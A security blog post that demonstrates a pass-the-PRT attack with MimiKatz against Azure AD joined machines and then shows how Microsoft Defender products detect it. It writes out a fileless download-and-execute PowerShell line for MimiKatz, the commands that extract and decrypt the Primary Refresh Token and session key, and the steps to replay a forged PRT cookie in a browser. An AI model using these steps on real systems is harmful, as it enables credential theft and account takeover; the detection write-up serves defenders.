Pass-the-PRT attack and detection by Microsoft Defender for ….

Active Directory lateral movement attack(s) via MimiKatz (e.g. pass-the-hash, pass-the-ticket, etc.) via domain-joined machines are detected by Microsoft Defender for Identity (MDI).

Please Microsoft: rebrand MDI to MDAD (Microsoft Defender for Active Directory) so people don’t get confused Azure AD is not in-scope of the detection.

MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).

The lifetime of a Primary Refresh Token is 14 days!

The attack

Second we need to download and execute MimiKatz from memory
iex (New-Object Net.Webclient).downloadstring(“https://<download-location>Invoke-Mimikatz.ps1”) or from disk by excluding a folder in the Windows Security settings.

Extract the PRT and the session key (both are needed) from the logged on user with MimiKatz.

Privilege::debug
Sekurlsa::cloudap

Copy and store the <PTR> and <KeyValue>.

Now we need to elevate permissions to SYSTEM (default) and use the DPAPI (Data protection application-programming interface) function cloudapkd (Azure PRT Key Derivation) to decode the <KeyValue> from <ProofOfPossesionKey>.

Token::elevate
Dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect

Copy the <Context> and <Derived Key> values, and with the <PRT> value we can generate a PTR cookie on another machine (not Azure AD joined).

Dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /Prt:<PRT>

The <Signed JWT> (JSON Web Token) can be used as PRT cookie in a (anonymous) browser session (edit the Chrome cookie for login.microsoftonline.com with the values:

Name: x-ms-RefreshTokenCredential
Value: <Signed JWT>
HttpOnly:

Detection

Azure AD Identity Protection

Microsoft Defender for Endpoint / Microsoft 365 Defender

The Incident (consists of 8 correlated Alerts) is triggered and the attack can be stopped (e.g Isolate device from the internet).

So to Detect (and Respond) to Online attacks it’s important to implement a defense in-depth detection layer (the Microsoft Defender for … Identity, Endpoints, Office 365 and Azure) with Protection via the zero trust (implicit trust of the chain) principle.

Many thanks to all the resources on the internet, especially Benjamin Delpy and Dirk-jan Mollema, a fellow dutchman).

Chief Technology Officer @ Nedscaper